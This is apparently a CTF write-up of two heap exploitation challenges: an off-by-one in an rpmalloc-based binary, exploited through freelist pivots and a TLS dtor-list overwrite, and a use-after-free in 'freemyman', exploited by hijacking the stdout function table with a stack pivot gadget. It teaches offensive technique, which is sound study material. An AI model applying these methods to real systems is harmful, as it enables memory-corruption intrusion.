I'm finally making my own ctf competition!
I wanted to make sure that my registration system is safe and since I know from past ctf experience that glibc malloc is very easy to exploit; I decided to use a different allocator :)
entering 69 as an option prints out the following string
which gives us a hint relating to the different allocator that the author mentioned in Description.
as I'm unfamiliar with the implementation, I tried to google to learn more about the details and possibly the known common attack technique specific to rpmalloc but found nothing until I stumbled upon this llvm page
at first glance, this seems to be the exact copy of the repo, however I skimmed it anyways and this part is really interesting
Quick overview
it mentions another allocator implementation develop by google that's similar to rpmalloc named tcmalloc with the difference of
Unlike tcmalloc, single blocks do not flow between threads, only entire spans of pages
due to failing to find any information regarding rpmalloc's implementation details, I switch my information gathering to finding the implementation details of tcmalloc instead which leads me to this page
furthermore, I also found this writeup of a challenge that's also involving tcmalloc
an interesting quote from it is that
tcmalloc doesn't do any security check, fake any pointers can do the magic.
which makes it easier to hijack freelist pointers and I also assume would be the same case for rpmalloc.
now let's get back to the challenge binary, we're only able to create and read an allocation, without any free
typedef struct {
long age;
char name[8];
char desc[32];
} hacker;
void register_hacker(void)
{
hacker *chunk;
ulong i;
for (i = 0; hackers[i] != (hacker *)0x0; i = i + 1) {
}
if (i < 100) {
chunk = (hacker *)malloc(0x30);
printf("How old is the hacker? ");
__isoc99_scanf("%lu",chunk);
getchar();
printf("What\'s the hacker\'s name ? ");
__isoc99_scanf("%16[^\n]s",chunk->name);
getchar();
printf("How would you describe this hacker ? ");
__isoc99_scanf("%32[^\n]s",chunk->desc);
getchar();
hackers[i] = chunk;
printf("Your hacker number is %zu !\n",i);
}
else {
puts("Sorry ! No spots left :/");
}
return;
}
void read_hacker(void)
{
ulong i;
hacker *chunk;
printf("What is the hacker\'s number ? ");
__isoc99_scanf("%zu",&i);
getchar();
if (i < 100) {
if (hackers[i] == (hacker *)0x0) {
printf("Sorry, but no hacker is registered as number %zu...\n",i);
}
else {
chunk = hackers[i];
puts("========================= HACKER ========================");
printf("Name: %s\n",chunk->name);
printf("Age: %lu\n",chunk->age);
printf("Description: %s\n",chunk->desc);
puts("=========================================================");
}
}
else {
puts("Invalid index.");
}
return;
}
note:
allocation fixed size of 0x30
allocations are stored in an array of pointers
limit to 100 allocations
to further understand the structure of the heap, I try to allocate two chunks and here's what we have
note:
the order of the freelists are not randomised
freelist pointer are stored in the beginning of each chunk
Vulnerability
with the off by one, we can cause overlapping chunk to overwrite the freelists and control the next allocation, essentially pivoting in heap.
Exploitation
Heap leak
the *next ptr of freelist is corresponds to the age field of the hacker structure, which being read using
__isoc99_scanf("%lu",chunk);
a trick to preserve the value and skip the read to a number is to give it an input of + and thus the value of the freelist pointer will be preserved and we can leak the heap from it
TLC & TLS leak
at this point, I have no idea if there's even a libc address within the heap region, and I thought we need to leak other addresses or structures.
I noticed that our first allocation always starts at an offset of 0x80 which is not page alligned, which makes me theorize that there might be some structure behind it that could have useful addresses.
and I was right
the structure had a pointer that within the memory it points, had another pointer to the Thread Local Storage (TLS). because of this, I just call that structure Thread Local Cache (TLC)
to leak it, we trigger the off by one vulnerability to cause partially overwrite the adjacent chunk's freelist pointer, best explained the following diagram and code
subsequentially, we also use + on the 6th allocation to preserve the TLC address and it became our next freelist, pivoting the heap once more.
this pattern of pivoting in the heap would be repeated over the course of the exploit
Libc leak
now at those regions we still haven't seen any signs of addresses that points to libc, so I want to know where these addresses are adjacent to in terms of their virtual mappings.
it was revealed that those addresses are adjacent to the ld addresses and are continuous with relative to each other
this way, we can pivot to the ld's GOT which contains libc function pointers
you can also try pwndbg's built-in command: leakfind which what I used initially to figure out if there's a libc pointer within the heap.
Hijack DTOR list
to gain shell, I take advantage of the fact we have TLS leaked already rather than ROP which requires further steps.
at this point we can do either hijack exit handler or hijack dtor list. the reason I chose the latter is because its more convenient as it only requires write primitive to the tls region rather than the former which requires a read to the tls region and then write to libc region.
to execute it, essentially we need to do 2 write
nullify the pointer guard
overwrite the dtor list
such that the following will be satisfied
as of libc 2.35 the offset of the list is 0x60 from tls, however this might changes and you can debug it by stepping into the instructions in __call_tls_dtors as you exit the program.
here's the exploit being ran againts the remote server
we're given a single binary named freemyman , here's some information about it
└──╼ [★]$ file freemyman
freemyman: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.4.0, with debug_info, not stripped
└──╼ [★]$ pwn checksec freemyman
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
upon adding a new request we're able give 2 input fields to it, title and content .
with no size prompt, it can be deducted that the size is hard coded, as can be seen from the decompilation, it is hard coded to be 0x90
noticed there's also two add options, add request and add data. as per my understanding there's no difference in these other than they're collected in a different pool and have different counter.
also unlike request, references to data cannot be edited, showed nor deleted. other than that, they're practically the same (I'm assuming a lot here)
I did read a bit more of the decompilation but not thoroughly as it's not the prettiest or at least I'm not really familiar to reverse it
I play around with it and to familiarize with the chunk structure a bit more. I tried to allocate two chunks and here's what we got
then I free those two chunks in the order of index 1 then 2
as can be seen, the freed chunks form a doubly linked list with pointer seemingly points to the address at an offset of -0x8.
also that notice how our input starting address is not 8 bytes alligned? for example the titlefield starts at +0x1 while contentis at +0x52.
I did a bit more trials and it seems that the byte right before the input, is the length to it which records how long the input to that specific field is. this would prove to be very annoying at later stage.
Vulnerability
as anyone probably could've guessed, this is an UAF challenge as the name implies. I did tried to edit the chunks after it had been deleted and we're able to do so.
we're able to partially overwrite the freelist.
Exploitation
heap pivot to arbitrary write
to hijack the freelist and pivot the heap to gain arbitrary write, we'll to work around the partial overwrite.
first step is to create an overlapping fake chunk utilizing UAF, with the *next pointer of the fake chunk points the to the address we wish, as follows:
as we reallocate the 2nd chunk, it will then dereference the next which points to our fake chunk which contains the address we wish to pivot to. we just have to allocate again to recycle the overlapped chunk and the next allocation will then be our targeted address.
Failed attempt
upon examining the implementation of each options, I stumbled upon this interesting piece of code
my idea here is to hijack the function pointer call, I look for functions similar to system or execve and find this as gadget
combined with write /bin/sh to U_$SYSTEM_$$_OUTPUT hopefully this will gets us a shell.
first, I tried to write to the function pointer to make sure we can control execution, and it works
however, I have multiple issues when writing to U_$SYSTEM_$$_OUTPUT, at this point also realized that FPC_THREADVAR_RELOCATE is not unique to the challenge itself, but there are a lot of builtin functions that references this variable as well which makes the scope of constraint quite big.
at that time of the CTF I just got back from a trip and was very exhausted, so I stopped here until the CTF ends
Stdout flush
after the CTF ends, kileak posted their writeup and I peek a little bit to give a bit of a hint for myself on how to move forward
I stopped reading where I got stuck and the hint was that they were overwriting the U_$SYSTEM_$$_STDOUT structure and hijacking its function table as it flushes when the program exit.
and I managed to recreate it
I noticed that to control the execution flow we need to setup the correct gadget address at [rbx + 0x38] which is well under our control as it within U_$SYSTEM_$$_STDOUT . we also control R10 which is perfect for this stack pivot gadget:
0x000000000045c0d8 : xchg r10, rsp ; ret
we just need setup our ROP payload to be in the heap and then fill R10 with the payload address and our ROP will be executed :)
The allocator is similar in spirit to tcmalloc from the . It uses separate heaps for each thread and partitions memory blocks according to a preconfigured set of size classes, up to 2MiB. Larger blocks are mapped and unmapped directly. Allocations for different size classes will be served from different set of memory pages, each "span" of pages is dedicated to one size class. Spans of pages can flow between threads when the thread cache overflows and are released to a global cache, or when the thread ends. Unlike tcmalloc, single blocks do not flow between threads, only entire spans of pages.
As I read more about it, I thought to myself that the implementation is very similar to the in Linux Kernel
tcmalloc also uses terms such as run and regions which is similar to 's implementation that I previously have encountered in 7th Cyber Mimic Defense. the tldr of those terms can be found in the writeup below
the vulnerability here is quite the same as . its a off by one caused by scanf calls.